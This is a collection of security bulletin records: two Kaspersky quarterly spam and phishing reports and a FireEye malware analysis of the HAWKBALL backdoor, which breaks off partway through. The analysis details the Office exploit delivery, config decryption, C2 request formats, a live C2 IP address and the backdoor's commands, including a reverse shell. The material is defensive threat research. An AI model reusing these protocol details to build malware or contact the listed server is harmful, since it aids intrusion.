August (53.54%). The average percentage of spam in global mail traffic was 52.54%, up 2.88 p.p. against the previous reporting period.\n\n### Sources of spam by country\n\n**_Sources of spam by country, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095029/spam-and-phishing-in-q3-2018_en_02.png>)_**\n\nThe three leading source countries for spam in Q3 were the same as in Q2 2018: China is in first place (13.47%), followed by the USA (10.89%) and Germany (10.37%). Fourth place goes to Brazil (6.33%), and fifth to Vietnam (4.41%). Argentina (2.64%) rounds off the Top 10.\n\n### Spam email size\n\n**_Spam email size, Q2 and Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095053/spam-and-phishing-in-q3-2018_en_03.png>)_**\n\nIn Q3 2018, the share of very small emails (up to 2 KB) in spam fell by 5.81 p.p. to 73.36%. The percentage of emails sized 5-10 KB increased slightly compared to Q2 (+0.76 p.p.) and amounted to 6.32%. Meanwhile, the proportion of 10-20 KB emails dropped by 1.21 p.p. to 2.47%. The share of 20-50 KB spam messages remained virtually unchanged, climbing a mere 0.49 p.p. to 3.17%.\n\n### Malicious attachments: malware families\n\n**_Top 10 malicious families in mail traffic, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095117/spam-and-phishing-in-q3-2018_en_04.png>)_**\n\nAccording to the results of Q3 2018, still the most common malware in mail traffic were objects assigned the verdict Exploit.Win32.CVE-2017-11882, adding 0.76 p.p. since the last quarter (11.11%). The Backdoor.Win32.Androm bot was encountered more frequently than in the previous quarter and ranked second (7.85%), while Trojan-PSW.Win32.Farei dropped to third place (5.77%). Fourth and fifth places were taken by Worm.Win32.WBVB and Backdoor.Java.QRat, respectively.\n\n### Countries targeted by malicious mailshots\n\n**_Countries targeted by malicious mailshots, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095143/spam-and-phishing-in-q3-2018_en_05.png>)_**\n\nThe Top 3 countries by number of Mail Anti-Virus triggers in Q3 remain unchanged since the start of the year: Germany took first place (9.83%), with Russia in second (6.61%) and the UK in third (6.41%). They were followed by Italy in fourth (5.76%) and Vietnam in fifth (5.53%).\n\n## Statistics: phishing\n\nIn Q3 2018, the Anti-Phishing system prevented **137,382,124** attempts to direct users to scam websites. **12.1%** of all Kaspersky Lab users worldwide were subject to attack.\n\n### Geography of attacks\n\nThe country with the highest percentage of users attacked by phishing in Q3 2018 was Guatemala with 18.97% (+8.56 p.p.).\n\n**_Geography of phishing attacks, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095211/spam-and-phishing-in-q3-2018_en_06.png>)_**\n\nQ2's leader Brazil dropped to second place, with 18.62% of users in this country attacked during the reporting period, up 3.11 p.p. compared to Q2. Third and fourth places went to Spain (17.51%) and Venezuela (16.75%), with Portugal rounding off the Top 5 (16.01%).\n\n**Country** | **%*** \n---|--- \nGuatemala | 18,97 \nBrazil | 18,62 \nSpain | 17,51 \nVenezuela | 16,75 \nPortugal | 16,01 \nChina | 15,99 \nAustralia | 15,65 \nPanama | 15,33 \nGeorgia | 15,10 \nEcuador | 15,03 \n \n_* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country_\n\n### Organizations under attack\n\n_The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._ \nAs in the previous quarter, the Global Internet Portals category was in first place, bumping its share up to 32.27% (+7.27 p.p.).\n\n**_Distribution of organizations whose users were attacked by phishers, by category, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095237/spam-and-phishing-in-q3-2018_en_07.png>)_**\n\n_Only organizations that can be combined into a general Finance category were attacked more than global Internet portals. This provisional category accounted for 34.67% of all attacks (-1.03 p.p.): banks and payment systems had respective shares of 18.26% and 9.85%; only online stores (6.56%) had to concede fourth place to IT companies (6.91%)._\n\n## Conclusion\n\nIn Q3 2018, the average share of spam in global mail traffic rose by 2.88 p.p. to 52.54%, and the Anti-Phishing system prevented more than 137 million redirects to phishing sites, up 30 million against the previous reporting period.\n\nSpammers and phishers continue to exploit big news stories. This quarter, for instance, great play was made of the release of the new iPhone. The search for channels to distribute fraudulent content also continued. Alongside an uptick in Instagram activity, we spotted fake notifications from websites and the spreading of fake news through media resources.\n\nA separate mention should go to the expanding geography of ransomware spam, featuring the use of victims' real personal data.", "cvss3": {}, "published": "2018-11-06T10:01:32", "type": "securelist", "title": "Spam and phishing in Q3 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-11-06T10:01:32", "id": "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "href": "https://securelist.com/spam-and-phishing-in-q3-2018/88686/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-08-21T14:05:36", "description": "\n\n## Quarterly highlights\n\n### Targeted attacks\n\nThe second quarter often saw phishers resort to targeted attacks, especially against fairly small companies. To attract attention, scammers imitated email messages and websites of companies whose products or services their potential victims could be using.\n\nThe scammers did not try to make any of the website elements appear credible as they created the fake. The login form is the only exception. One of the phishing websites we discovered even used a real captcha on that form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160309/sl_spam_report_q2_01.png>)\n\nThe main pretext that scammers use to prompt the target to enter their information is offering an online catalog that purportedly only becomes available once the target provides the login and password to their email account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160339/sl_spam_report_q2_02.png>)\n\nIn one instance, phishers used Microsoft Sway, the service for creating and sharing presentations, to hunt for logins and passwords for corporate accounts. The user was offered to view presentations belonging to another company in the same industry by following a link and entering the login and password for their work email account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160407/sl_spam_report_q2_03.png>)\n\nA fake website can be recognized by its design. The workmanship is often rough, and the chunks of information on the various pages are disjointed due to being pulled from diverse sources. Besides, pages like that are created on free hosting websites, as cybercriminals are not prepared to invest too much money in the fakes.\n\nA targeted phishing attack may lead to [serious consequences](<https://www.kaspersky.com/blog/fighting-internal-bec/>): after gaining access to an employee&#x27;s mailbox, cybercriminals can use it for further attacks on the company itself, or its employees or partners.\n\n### Waiting for your package: keeping your data secure and your computer, clean\n\nAs the pandemic reached its peak, mail service between countries became complicated and delivery times noticeably increased. Organizations responsible for delivery of letters and parcels rushed to notify recipients about all kinds of possible delays and hiccups. This is exactly the type of email messages that scammers started to imitate: the target was offered to open the attachment to find out the address of the warehouse with the package that had failed to reach them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160436/sl_spam_report_q2_04.png>)\n\nAnother, relatively original, trick employed by cybercriminals was a message containing a miniature image of a postal receipt. The scammers expected the curious recipient to take the attachment, which was an ACE archive despite its name containing &quot;jpg&quot;, for the real thing and open it. The mailshots we detected used this as a method of spreading the Noon spyware. The scam can only be detected if the email client displays the full names of attachments.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160459/sl_spam_report_q2_05.png>)\n\nIn another fraudulent scheme, the target was to told that their order could not be dispatched due to a restriction on mailing of certain types of goods, but the processing of the package would be resumed once the restrictions were lifted. All required documents and a new tracking number could purportedly be found in the attached archive. In reality, the attachment contained a copy of the Androm backdoor, which opened remote access to the victim&#x27;s computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160527/sl_spam_report_q2_06.png>)\n\nScammers posing as courier service employees sent out email warning that packages could not be delivered due to failure to pay for the shipping. The &quot;couriers&quot; accepted codes for prepaid cards issued by Paysafecard as payment. These cards range from \u20ac10 to \u20ac100 and can be used in stores that accept this payment method. The victim was offered to email a \u20ac50 card code \u2013 incidentally, an activity that the payment system&#x27;s rules explicitly forbid. The cybercriminals chose this payment method for a reason: blocking or revoking a Paysafecard payment is next to impossible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160552/sl_spam_report_q2_07.png>)\n\n### Banking phishing amid a pandemic\n\nBanking phishing attacks in the second quarter of the year often employed emails that offered borrowers various pandemic-related discounts and bonuses. Accessing the benefits involved downloading a file with a manual or following a link. As a result, the scammers could access the user&#x27;s computer, personal data or credentials for various services, depending on the scheme.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160622/sl_spam_report_q2_08.png>)\n\nThe COVID-19 theme was present, too, in the widely known fake bank emails informing customers that their accounts had been blocked, and that they needed to enter their login and password on a special page to get back their access.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160654/sl_spam_report_q2_09.png>)\n\nThe pandemic saw the revival of a more-than-a-decade-old scheme, in which scammers sent victims emails offering to open the attachment to get the details of a low-rate loan. This time, the rate reduction was linked to the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160717/sl_spam_report_q2_10.png>)\n\n### Taxes and exemptions\n\nThe beginning of the second quarter is the time for submitting tax forms in many countries. This year, tax authorities in some countries reduced the tax burden or exempted citizens from paying taxes. Scammers naturally grabbed the opportunity: mailshots we detected reported that the government had approved a compensation payout, and claiming it involved following a link to the tax agency&#x27;s website, which, unsurprisingly, proved to be fake. Some of the email messages were not too well crafted, and looking closely at the From field was all it took to detect a fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160742/sl_spam_report_q2_11.png>)\n\nMore ingenious scammers made up a whole legend: in an email presented as being from the IRS (United States Internal Revenue Service), they said there was a $500,000 &quot;pandemic payment&quot;, authorized jointly by the UN and the World Bank, that could be transferred to the recipient if it had not been for a woman named Annie Morton. The lady, the email said, had showed up at an IRS office carrying a warrant for the payment. She purportedly said that the intended recipient had succumbed to COVID-19, and she was the one to receive the $500,000. The message insisted that the victim contact a certain IRS employee \u2013 and not any other, so as to avoid a mistake \u2013 to prove that they were alive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160814/sl_spam_report_q2_12.png>)\n\nSubsequent steps would most likely be identical to the well-known inheritance scam, where the victim would be offered to pay for the services of a lawyer, who would then disappear with the advance money. One might guess that instead of the advance, the scammers would ask for a fee for executing papers that would prove the victim was still alive.\n\n### Getting refunded and losing it all\n\nTax refunds are not the only type of aid that states have been providing to individuals and companies distressed by the pandemic. And not the only type the scammers have been using. Thus, Brazilians were &quot;allowed&quot; not to pay their energy bills, and all they had to do was register on a website by following a link in an &quot;email from the government&quot;. The hyperlink had an appearance designed to trick the user into thinking that they were being redirected to a government portal, whereas in reality, the victim had a trojan installed on their computer, which downloaded and then ran another trojan, Sneaky.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160850/sl_spam_report_q2_13.png>)\n\nPersonal information leak is another hazard faced by those who risk registering for &quot;compensation&quot; on a suspicious website. For example, one mailshot offered individuals aged over seventy to go to a website and fill out a form, which contained fields for the last name, first name, gender, mailing address and SSN (social security number, for US citizens).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160915/sl_spam_report_q2_14.png>)\n\nIdentifying a fake email is easy. One just needs to take a closer look at the From field and the subject, which appears odd for an official email.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160942/sl_spam_report_q2_15.png>)\n\nOnce the target filled out the entire form, they were redirected to the official Web page of the World Health Organization&#x27;s COVID-19 Solidarity Response Fund, a real organization, to give a donation. This helped the scammers to create an illusion that the questionnaire was official and to build a vast database containing the details of individuals over seventy years of age.\n\nFake emails promising government compensations carried one more threat: instead of getting paid, the victim risked losing their own money to the cybercriminals. Thus, a fake email from the International Monetary Fund announced that the recipient and sixty-four other &quot;lucky&quot; individuals had been selected to receive compensations from a five-hundred-million-dollar fund set up by the IMF, China and the European Union for supporting victims of the pandemic. Getting \u20ac950,000 was a matter of contacting the IMF office at the address stated in the message. Subsequent events followed the lottery-scam script: getting the money required paying a commission first.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161017/sl_spam_report_q2_16.png>)\n\n### Fake HR: getting dismissed by professional spammers\n\nThe pandemic-related economic downturns in several countries caused a surge in unemployment, an opportunity that cybercriminals were quick to take advantage of. One mailshot, sent in the name of the US Department of Labor, offered looking at the latest changes to the parental leave and sick leave laws. The sender said these laws had been amended following the adoption of the coronavirus relief act, and all details on the amendments were available in the attachment. What the attachment really contained was [Trojan-Downloader.MSOffice.SLoad.gen](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.SLoad/>), a trojan mostly used for downloading and installing ransomware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161249/sl_spam_report_q2_18.png>)\n\nAnother way scammers &quot;surprised&quot; potential victims was dismissal notices. The employee was informed that the company had been forced to discharge them due to the pandemic-induced recession. The dismissal &quot;followed the book&quot;, in that the attachment, according to the author of the email, contained a request form for two months&#x27; worth of pay. Needless to say, the victim only found malware attached.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21132436/sl_spam_report_q2_19_2.jpg>)\n\n \n\n### Your data wanted, now\n\nThe share of voice phishing in email traffic rose noticeably at the end of Q2 2020. One mailshot warned of a suspicious attempt at logging in to the target&#x27;s Microsoft account, originating in another country, and recommended that the target contact support by phone at the supplied number. This spared the scammers the need to create a large number of fake pages, as they tried to get all the information they needed over the phone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161501/sl_spam_report_q2_23.png>)\n\nAn even less conventional way of obtaining personal data could be found in emails that offered subscription to COVID-19 updates, where the target only needed to verify their email address. Besides personal data theft, forms like this can be used for collecting mailbox usage statistics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161522/sl_spam_report_q2_24.png>)\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\n_Proportion of spam in global email traffic, __Q1 2020 \u2013 Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164340/sl_spam_report_q2_01-en-dolya-spama-v-mirovom-pochtovom-trafike-q1-2020-q2-2020-gg.png>))_\n\nIn Q2 2020, the largest share of spam (51.45 percent) was recorded in April. The average percentage of spam in global email traffic was 50,18%, down by 4.43 percentage points from the previous reporting period.\n\n_Proportion of spam in Runet email traffic, Q1 2020 \u2013 Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164419/sl_spam_report_q2_02-en-dolya-spama-v-pochtovom-trafike-runeta-q1-2020-q2-2020-gg.png>))_\n\nThe Russian segment of the World Wide Web presents the opposite picture, with the end of the quarter accounting for the larger share of spam: spam peaked in June as it reached 51.23 percent. The quarterly average was 50.35 percent, 1.06 p.p. lower that the first quarter&#x27;s average.\n\n### Sources of spam by country\n\n_Countries where spam originated in Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164457/sl_spam_report_q2_03-en-strany-istochniki-spama-v-mire-q2-2020-g.png>))_\n\nThe composition of the top five Q1 2020 spam leaders remained unchanged in the second quarter. Russia kept the lead with 18.52 percent, followed by Germany with 11.94 percent, which had overtaken the US, now third with 10.65 percent. France (7.06 percent) and China (7.02 percent) remained fourth and fifth, respectively.\n\nSixth was the Netherlands (4.21 percent), closely followed by Brazil (2.91 percent), Turkey (2.89 percent), Spain (2.83 percent) and lastly, Japan (2.42 percent).\n\n### Spam email size\n\n_Spam email size, Q1 \u2013 Q2 2002 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164535/sl_spam_report_q2_04-en-razmery-spamovyh-pisem-q1-2020-q2-2020-gg.png>))_\n\nThe share of extra small emails kept going down, dropping by 8.6 p.p. to 51.30 percent in Q2 2020. Emails between 5 KB and 10 KB decreased slightly (by 0.66 p.p.) compared to the previous quarter, to 4.90 percent. Meanwhile, the share of spam messages within the range of 10 KB to 20 KB rose by 4.73 p.p. to 11.09 percent. The share of larger messages between 100 KB and 200 KB in the second quarter fell by 1.99 p.p. to 2.51 percent compared to Q1 2020.\n\n### Malicious attachments: malware families\n\n_Number of Mail Anti-Virus triggerings, Q1 2020 \u2013 Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164604/sl_spam_report_q2_05-en-kolichestvo-srabatyvanij-pochtovogo-antivirusa-q1-2020-q2-2020-gg.png>))_\n\nOur security solutions detected a total of **43,028,445** malicious email attachments in Q2 2020, an increase of six and a half million year-on-year.\n\n_TOP 10 malicious attachments in mail traffic, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164632/sl_spam_report_q2_06-en-top-10-vredonosnyh-vlozhenij-v-pochtovom-trafike-q2-2020-g.png>))_\n\nTrojan.Win32.Agentb.gen (13.27 percent) was the most widespread malware in email attachments in the second quarter of the year, followed by Trojan-PSW.MSIL.Agensla.gen (7.86 percent) in second place and Exploit.MSOffice.CVE-2017-11882.gen (7.64 percent) in third place.\n\n_TOP 10 malware families in mail traffic, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164702/sl_spam_report_q2_07-en-top-10-vredonosnyh-semejstv-v-pochtovom-trafike-q2-2020-g.png>))_\n\nThe most widespread malware family in the second quarter, as in the previous one, was [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) (13.33 percent), followed by [Trojan-PSW.MSIL.Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) (9.40 percent) and [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (7.66 percent).\n\n### Countries targeted by malicious mailshots\n\n_Distribution of Mail Anti-Virus triggerings by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164730/sl_spam_report_q2_08-en-raspredelenie-srabatyvanij-pochtovogo-antivirusa-po-stranam-q2-2020-g.png>))_\n\nSpain (8.38%) took the lead in Mail Anti-Virus triggerings in Q2 2020, just as in Q1 2020. Second came Russia with 7.37 percent of attacks, and third came Germany with 7.00 percent.\n\n## Statistics: phishing\n\nKaspersky Anti-Phishing helped to prevent **106,337,531** attempts at redirecting users to phishing Web pages in Q2 2020, a figure that is almost thirteen million lower than that for the first quarter. The share of unique attacked users accounted for 8.26 percent of the total Kaspersky users in the world, with **1,694,705** phishing wildcards added to the system database.\n\n### Attack geography\n\nVenezuela was traditionally the country with the largest share of users attacked by phishers (17.56 percent).\n\n_Geography of phishing attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164806/sl_spam_report_q2_09-en-geografiya-fishingovyh-atak-q1-2020-g-karta.png>))_\n\nPortugal was 4.05 p.p. behind with 13.51 percent, closely followed by Tunisia with 13.12 percent.\n\n**Country** | **%*** \n---|--- \nVenezuela | 17.56% \nPortugal | 13.51% \nTunisia | 13.12% \nFrance | 13.08% \nBrazil | 12.91% \nQatar | 11.94% \nBahrain | 11.88% \nGuadeloupe | 11.73% \nBelgium | 11.56% \nMartinique | 11.34% \n \n_*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country_\n\n### Top-level domains\n\nStarting with this quarter, we have decided to maintain statistics on top-level domains used in phishing attacks. Quite predictably, COM led by a huge margin, with 43.56 percent of the total number of top-level domain names employed in attacks. It was followed by NET (3.96 percent) and TOP (3.26 percent). The Russia-specific RU domain took fourth place with 2.91 percent, followed by ORG with 2.55 percent.\n\n_Top-level domains most popular with phishers, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164838/sl_spam_report_q2_10-en-domennye-zony-verhnego-urovnya-naibolee-chasto-ispolzuemye-fisherami-q2-2020.png>))_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Anti-Phishing component. This component detects pages with phishing content that the user tried to access by following email or Web links, regardless of how the user got to the page: by clicking a link in a phishing email or in a message on a social network, or after being redirected by a malicious program. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\n_ _As in the first quarter, the Online Stores category accounted for the largest share of phishing attacks, its share increasing by 1.3 p.p. to 19.42 percent. Global Web Portals again received the second-largest share of attacks, virtually unchanged at 16.22 percent. Banks (11.61 percent) returned to third place, pushing Social Networks (10.08 percent) to fourth place.\n\n_Distribution of organizations subjected to phishing attacks by category, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164907/sl_spam_report_q2_11-en-raspredelenie-organizacij-chi-polzovateli-byli-atakovany-fisherami-po-kategoriyam-q2-2020-g.png>))_\n\n## Conclusion\n\nIn our summary of the first quarter, we hypothesized that COVID-19 would remain spammers&#x27; and fishers&#x27; key theme in the future. That is exactly what happened: seldom did a mailshot fail to mention the pandemic as phishers added relevance to their tried and tested schemes and came up with brand-new ones.\n\nThe average share of spam in global email traffic in Q2 2020 dropped by _4.43 _p.p. to 50.18 percent compared to the previous reporting period, and attempts to access phishing pages amounted to 106 million.\n\nFirst place in the list of spam sources in Q2 went to Russia with a share of 18.52 percent. Our security solutions blocked a total of 43,028,445 malicious email attachments, with the most widespread &quot;email-specific&quot; malware family being Trojan.Win32.Agentb.gen, which infected 13.33 percent of the total email traffic.", "cvss3": {}, "published": "2020-08-07T10:00:07", "type": "securelist", "title": "Spam and phishing in Q2 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-08-07T10:00:07", "id": "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "href": "https://securelist.com/spam-and-phishing-in-q2-2020/97987/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2020-11-23T02:06:52", "description": "FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.\n\nHAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.\n\nFigure 1 shows the decoy used in the attack.\n\n \nFigure 1: Decoy used in attack\n\nThe decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.\n\n \nFigure 2: Shellcode decryption routine\n\nThe decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP (Figure 3).\n\n \nFigure 3: Payload dropped as Word plugin\n\n#### Technical Details\n\nDllMain of the dropped payload determines if the string WORD.EXE is present in the sample\u2019s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe &lt; C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\hh14980443.wll, DllEntry&gt; using the WinExec() function.\n\nDllEntry is the payload\u2019s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:\n\n&lt;Month int&gt;/&lt;Date int&gt; &lt;Hours&gt;:&lt;Minutes&gt;:&lt;Seconds&gt;\\t&lt;Hardcoded Digit&gt;\\t&lt;Hardcoded Digit&gt;\\n\n\nExample:\n\n05/22 07:29:17 4 0\n\nThis log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).\n\n \nFigure 4: String format for log file\n\nThe encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.\n\n \nFigure 5: Config decryption routine\n\nThe IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:\n\n05/22 07:49:48 149.28.182.78.\n\n#### Mutex Creation\n\nThe malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string **config/systemprofile.**\n\n \nFigure 6: Verify whether malware is running as a system profile\n\nIf the malware is running as a system profile, the string **d0c** from the decrypted config file is used to create the mutex. Otherwise, the string **_cu** is appended to **d0c **and the mutex is named** d0c_cu **(Figure 7).\n\n \nFigure 7: Mutex creation\n\nAfter the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.\n\n#### Network Communication\n\nHAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:\n\n * Content-Length: &lt;content_length&gt;\n * Cache-Control: no-cache\n * Connection: close\n\nThe malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.\n\n \nFigure 8: Network request\n\nThe network request is formed with four parameters in the format shown in Figure 9.\n\n**Format = \"?t=%d&amp;&amp;s=%d&amp;&amp;p=%s&amp;&amp;k=%d\"**\n\n \nFigure 9: GET request parameters formation\n\nTable 1 shows the GET request parameters.\n\n**Value**\n\n| \n\n**Information** \n \n---|--- \n \nT\n\n| \n\nInitially set to 0 \n \nS\n\n| \n\nInitially set to 0 \n \nP\n\n| \n\nString from decrypted config at 0x68 \n \nk\n\n| \n\nThe result of GetTickCount() \n \nTable 1: GET request parameters\n\nIf the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).\n\n**Format = \"?e=%d&amp;&amp;t=%d&amp;&amp;k=%d\"**\n\n \nFigure 10: Second GET request\n\n \nFigure 11: Second GET request parameters formation\n\nTable 2 shows information about the parameters.\n\n**Value**\n\n| \n\n**Information** \n \n---|--- \n \nE\n\n| \n\nInitially Set to 0 \n \nT\n\n| \n\nInitially set to 0 \n \nK\n\n| \n\nThe result of GetTickCount() \n \nTable 2: Second GET request parameters\n\nIf the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.\n\nThis Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor\u2019s command.\n\n \nFigure 12: Function table\n\nTable 3 shows the commands supported by HAWKBALL.\n\n**Command**\n\n| \n\n**Operation Performed** \n \n---|--- \n \n0\n\n| \n\nSet URI query string to value \n \n16\n\n| \n\nUnknown \n \n17\n\n| \n\nCollect system information \n \n18\n\n| \n\nExecute a provided argument using CreateProcess \n \n19\n\n| \n\nExecute a provided argument using CreateProcess and upload output \n \n20\n\n| \n\nCreate a cmd.exe reverse shell, execute a command, and upload output \n \n21\n\n| \n\nShut down reverse shell \n \n22\n\n| \n\nUnknown \n \n23\n\n| \n\nShut down reverse shell \n \n48\n\n| \n\nDownload file \n \n64\n\n| \n\nGet drive geometry and free space for logical drives C-Z \n \n65\n\n| \n\nRetrieve information about provided directory \n \n66\n\n| \n\nDelete file \n \n67\n\n| \n\nMove file \n \nTable 3: HAWKBALL commands\n\n#### Collect System Information\n\nCommand ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:\n\n * Computer Name\n * User Name\n * IP Address\n * Active Code Page\n * OEM Page\n * OS Version\n * Architecture Details (x32/x64)\n * String at 0x68 offset from decrypted config file\n\nThis information is retrieved from the victim using the following WINAPI calls:\n\n**Format = \"%s;%s;%s;%d;%d;%s;%s %dbit\"**\n\n * GetComputerNameA\n * GetUserNameA\n * Gethostbyname and inet_ntoa\n * GetACP\n * GetOEMPC\n * GetCurrentProcess and IsWow64Process\n\n \nFigure 13: System information\n\nThe collected system information is concatenated together with a semicolon separating each field:\n\nWIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit\n\nThis information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is **0xE5044C18**.\n\nOnce encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.\n\n \nFigure 14: POST request\n\nIn the request header, the field **Cookie **is** **set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.\n\nTable 4 shows the parameters of this POST request.\n\n**Parameter**\n\n| \n\n**Information** \n \n---|--- \n \nE\n\n| \n\nInitially set to 0 \n \nT\n\n| \n\nDecimal form of the little-endian XOR key \n \nK\n\n| \n\nThe result of GetTickCount() \n \nTable 4: POST request parameters\n\n##### Create Process\n\nThe malware creates a process with specified arguments. Figure 15 shows the operation.\n\n \nFigure 15: Command create process\n\n##### Delete File\n\nThe malware deletes the file specified as an argument. Figure 16 show the operation.\n\n \nFigure 16: Delete file operation\n\n##### Get Directory Information\n\nThe malware gets information for the provided directory address using the following WINAPI calls:\n\n * FindFirstFileW\n * FindNextFileW\n * FileTimeToLocalFileTime\n * FiletimeToSystemTime\n\nFigure 17 shows the API used for collecting information.\n\n \nFigure 17: Get directory information\n\n##### Get Disk Information\n\nThis command retrieves the drive information for drives C through Z along with available disk space for each drive.\n\n 